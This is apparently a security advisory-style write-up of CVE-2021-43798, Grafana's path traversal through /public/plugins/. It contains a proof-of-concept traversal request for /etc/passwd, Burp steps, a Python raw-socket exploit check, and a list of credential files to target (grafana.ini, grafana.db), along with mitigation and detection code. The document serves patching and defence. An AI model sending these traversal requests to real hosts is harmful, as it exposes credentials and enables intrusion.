Vulnerable Version
8.0.0-beta1 – 8.3.0
Fixed Version
8.3.1, 8.2.7, 8.1.8, 8.0.7
Base Score
7.5 High
Vendor Description:-
Grafana is an open-source analytics and monitoring platform designed to visualize, query, and analyze data from multiple sources in real-time. It provides an intuitive and highly customizable dashboard interface, enabling users to track key performance metrics, detect trends, and respond to anomalies across diverse systems and applications.
Vulnerability Description:-
The root cause of CVE-2021-43798 lies in how Grafana serves plugin assets from the /public/plugins/<pluginId>/<file> endpoint. The handler joins the user-supplied file path onto the plugin's directory without checking that the result still lies inside that directory, and the endpoint requires no authentication, so a remote attacker can:
Escape the intended plugin directory using directory traversal sequences (../).
Read any file on the underlying operating system that the Grafana service account can read.
The endpoint is intended to serve a plugin's static assets (module.js, images and so on) from that plugin's own directory on disk. For the core plugins that directory is <grafana_installation_path>/public/app/plugins/<type>/<pluginId>, exposed under URLs such as:
<grafana_host_url>/public/plugins/annolist/
<grafana_host_url>/public/plugins/barchart/
<grafana_host_url>/public/plugins/bargauge/
<grafana_host_url>/public/plugins/candlestick/
<grafana_host_url>/public/plugins/cloudwatch/
<grafana_host_url>/public/plugins/dashlist/
<grafana_host_url>/public/plugins/elasticsearch/
…….. (any plugin installed on the target, core or third-party, works as the prefix; an unknown plugin ID is answered with 404.)
However, because the trailing file path is not sanitized, the attacker can walk up out of the plugin directory. For example:
Requesting ../../../../../../../../etc/passwd beneath any plugin's URL prefix returns the contents of /etc/passwd.
POC
The directory being served is <grafana_home>/public/app/plugins/panel/<pluginId>. On a standard package installation Grafana's home directory is /usr/share/grafana, so the plugin directory /usr/share/grafana/public/app/plugins/panel/alertlist sits eight levels below the filesystem root; eight ../ segments therefore reach /.
HTTP Request
GET http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
The path has to reach the server exactly as written. Most HTTP clients collapse ../ before sending (curl does unless you pass --path-as-is), which silently turns the test into a plain request for /etc/passwd that Grafana answers with 404.

- Now verify the arbitrary file read using Burp Suite.
First intercept a request to the login page and send it to Repeater.

After sending the request to Repeater, change the request URI (Repeater sends the path untouched):
/login → /public/plugins/alertlist/../../../../../../../../etc/passwd
A vulnerable instance answers 200 with the contents of /etc/passwd; a patched instance answers 404.
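The same request as a stand-alone Python script. This is an added example, not code from the original write-up or from Grafana: it speaks HTTP over a raw socket so the ../ segments are sent verbatim, which is the step most clients get wrong (curl needs --path-as-is; python-requests/urllib3 normalize the path before sending). The host, port and plugin ID are constructed defaults, and the /etc/passwd fingerprint is a heuristic.

```python
import socket
import sys

# Constructed example values; the target host/port and plugin ID are
# assumptions for illustration, not taken from any real deployment.
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 3000
DEFAULT_PLUGIN = "alertlist"

# /usr/share/grafana/public/app/plugins/panel/<pluginId> is eight levels
# below the filesystem root, so eight "../" segments reach "/".
TRAVERSAL_DEPTH = 8


def build_traversal_path(plugin_id, target, depth=TRAVERSAL_DEPTH):
    """Request path: an installed plugin ID, enough "../" to reach "/", then the target file."""
    return "/public/plugins/%s/%s%s" % (plugin_id, "../" * depth, target.lstrip("/"))


def build_raw_request(host, path):
    """Serialize a minimal HTTP/1.1 GET with the path exactly as given.

    This is why a socket is used instead of a client library: curl (without
    --path-as-is) and python-requests/urllib3 collapse "/../" before sending,
    so the server never sees the traversal and the probe degrades into a
    request for /etc/passwd that Grafana simply answers with 404.
    """
    request = (
        "GET %s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "User-Agent: cve-2021-43798-check\r\n"
        "Connection: close\r\n"
        "\r\n"
    ) % (path, host)
    return request.encode("ascii")


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status_code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def looks_like_passwd(body):
    """Cheap fingerprint for /etc/passwd: the first line is the root entry, uid 0 / gid 0."""
    first_line = body.split(b"\n", 1)[0]
    return first_line.startswith(b"root:") and b":0:0:" in first_line


def check_target(host, port, plugin_id=DEFAULT_PLUGIN, target="/etc/passwd", timeout=5.0):
    """Send the traversal request and report (status_code, body_looks_like_passwd)."""
    path = build_traversal_path(plugin_id, target)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_raw_request("%s:%d" % (host, port), path))
        chunks = []
        while True:  # Connection: close, so read until the server hangs up
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    status, _, body = parse_response(b"".join(chunks))
    return status, looks_like_passwd(body)


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else DEFAULT_PORT
    status, leaked = check_target(host, port)
    if status == 200 and leaked:
        print("VULNERABLE: %s:%d returned /etc/passwd via plugin asset traversal" % (host, port))
    else:
        print("not vulnerable, or plugin %s not installed (HTTP %d)" % (DEFAULT_PLUGIN, status))
```

Run it as python3 check.py <host> <port>. A 404 can mean either a patched instance or a plugin ID that is not installed on the target, so try a second core plugin ID before concluding the host is fixed.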

Impact:
Data Exposure: The read runs with the privileges of the Grafana service account and is read-only, but that is enough to pull Grafana's own configuration and state: /etc/grafana/grafana.ini (admin credentials, secret_key, database connection strings) and the SQLite database /var/lib/grafana/grafana.db (user password hashes and data source credentials encrypted with that secret_key), plus any other file that account can read, such as /etc/passwd or environment files.
Expanded Attack Surface: Credentials and configuration obtained through the file read let an attacker log in to Grafana, reach the data sources it is connected to, or pivot further into the network.
Compliance and Regulatory Risks: Organizations may face compliance issues if exposed data contains personally identifiable information (PII) or falls under data protection regulations such as GDPR or HIPAA.
Operational Disruption: Although the vulnerability itself only discloses files, the credentials it exposes can be used to make unauthorized changes, disrupt service, or compromise dependent applications.
Mitigations:
All installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible to 8.3.1, 8.2.7, 8.1.8 or 8.0.7 (or later).
If you cannot upgrade, a reverse proxy in front of Grafana that normalizes the request path before routing mitigates the vulnerability: the proxy resolves the ../ segments, so Grafana only ever receives /etc/passwd, for which it has no route. In Envoy this is the normalize_path setting on the HTTP connection manager. The proxy only helps if Grafana's own port (3000 by default) is not reachable directly, so restrict it to the proxy host.
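To show what the proxy-side mitigation actually does, and to turn the same idea into a detection rule, here is an added Python example (not code from the original write-up, Grafana or Envoy). remove_dot_segments is the RFC 3986 path normalization a proxy such as Envoy applies with normalize_path enabled; the routing table and the request lines are constructed to illustrate the effect and are not Grafana's real router or any real log format.

```python
from urllib.parse import unquote

PLUGIN_ASSET_PREFIX = "/public/plugins/"


def remove_dot_segments(path):
    """RFC 3986 section 5.2.4 for an absolute path: resolve "." and ".." purely as text.

    This is what a normalizing reverse proxy does before routing; nothing here
    touches the filesystem, which is exactly why Grafana never sees the traversal.
    """
    segments = path.split("/")[1:]  # drop the empty segment before the leading "/"
    out = []
    for i, segment in enumerate(segments):
        if segment in (".", ".."):
            if segment == ".." and out:
                out.pop()
            if i == len(segments) - 1:
                out.append("")  # "/a/." and "/a/b/.." keep their trailing slash
            continue
        out.append(segment)
    return "/" + "/".join(out)


def escapes_plugin_dir(raw_path):
    """True when a request aimed at the plugin asset route resolves outside it.

    Percent-decoding first (so %2e%2e counts as ..) is an assumption made here;
    whether a given proxy decodes before it normalizes is proxy-specific.
    """
    decoded = unquote(raw_path)
    if not decoded.startswith(PLUGIN_ASSET_PREFIX):
        return False
    return not remove_dot_segments(decoded).startswith(PLUGIN_ASSET_PREFIX)


def route_after_proxy(raw_path):
    """Constructed stand-in for Grafana's router, fed the path the proxy forwards.

    After normalization the traversal has become /etc/passwd, which matches no
    route, so the vulnerable plugin asset handler is never reached.
    """
    normalized = remove_dot_segments(unquote(raw_path))
    if normalized.startswith(PLUGIN_ASSET_PREFIX):
        return "plugin-assets", normalized
    if normalized == "/login":
        return "login", normalized
    return "404", normalized


# Constructed request lines in the common "METHOD PATH PROTO" shape; not a real
# Grafana or proxy log. Detection has to see the path as received: a log written
# after normalization only ever shows "/etc/passwd".
SAMPLE_REQUEST_LINES = [
    "GET /public/plugins/alertlist/module.js HTTP/1.1",
    "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1",
    "GET /public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1",
    "GET /public/plugins/alertlist/./img/../img/icon.svg HTTP/1.1",
    "GET /login HTTP/1.1",
]


def flag_traversal_requests(request_lines):
    """Return the raw paths whose dot segments would escape /public/plugins/."""
    flagged = []
    for line in request_lines:
        parts = line.split(" ")
        if len(parts) < 2:
            continue
        path = parts[1].split("?", 1)[0]  # ignore any query string
        if escapes_plugin_dir(path):
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    for path in flag_traversal_requests(SAMPLE_REQUEST_LINES):
        print("traversal attempt:", path, "->", route_after_proxy(path))
```

Note that a request with ../ that stays inside the plugin directory (the icon.svg line) is legitimate and is not flagged; the rule keys on where the path ends up, not on the mere presence of dot segments, which keeps the false-positive rate low enough to alert on.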